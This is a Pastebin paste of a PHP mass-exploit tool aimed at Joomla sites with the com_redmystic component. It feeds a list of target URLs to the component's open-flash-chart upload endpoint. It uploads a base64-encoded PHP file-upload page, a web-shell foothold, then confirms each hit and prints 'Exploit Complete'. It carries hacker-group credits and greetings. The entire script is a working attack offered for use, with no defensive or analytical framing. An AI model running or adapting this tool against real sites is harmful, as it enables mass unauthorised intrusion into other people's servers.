Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <form method='POST'>
- <input type='text' name='name' value='p.php'>
- <input type='submit' value='Exploit' name='exploit'><br>
- <textarea name='sites' cols='45' rows='15'>Here Sites ;)</textarea>
- </form>
- <?
- /*
- # Coded By : xSecurity
- # Homepage : sec4ever.com - is-sec.com
- # GreetsTo : b0x - Mr.Dm4r - Lov3rDNS - RAB3OUN - r0kin - Shark Hidden - DeeF - DamaneDz - b0y h4ck - All Sec4ever Member'z
- # Scanning : [ com_civicrm , com_acymailing , com_jnewsletter , com_jinc , com_maianmedia , com_jnews ]
- */
- @set_time_limit(0);
- $site = explode("\r\n", $_POST['sites']);
- $filename = $_POST['name'];
- $path = array('/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php');
- $name = array("/administrator/components/com_redmystic/chart/tmp-upload-images/");
- $uploader = base64_decode("PD9waHAKZWNobyAnPHRpdGxlPlVwbG9hZCBGaWxlcyB4U2VjdXJpdHkgfCBTZWM0ZXZlci5Db008L3RpdGxlPic7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11
- bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7CglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgQ29tcGxhdGUgISEhPC9iPjxicj48YnI+JzsgfQoJZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQp9Cj8+");
- $options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
- $context = stream_context_create($options);
- if($_POST['exploit'])
- {
- foreach($site as $sites)
- {
- foreach($path as $upload)
- {
- $fopen = @fopen("{$sites}{$upload}?name={$filename}", 'r', false, $context);
- }
- foreach($name as $names)
- {
- $url = "{$sites}{$names}{$filename}";
- $check = @file_get_contents($url);
- if(eregi("Sec4ever.CoM", $check))
- {
- echo "<font face='Tahoma' size='2'>[+] Exploit Complete => {$sites}/{$names}/{$filename} <br />";
- flush();
- }
- }
- }
- }
- echo "<font face='Tahoma' size='2'>[+] Coded By xSecurity => Sec4ever.CoM - is-sec.com <br> 4U : b0x - Mr.Dm4r - Lov3rDNS - RAB3OUN - r0kin - Shark Hidden - DeeF - DamaneDz - b0y h4ck - All Sec4ever Member'z</font>";
- ?>
Add Comment
Please, Sign In to add comment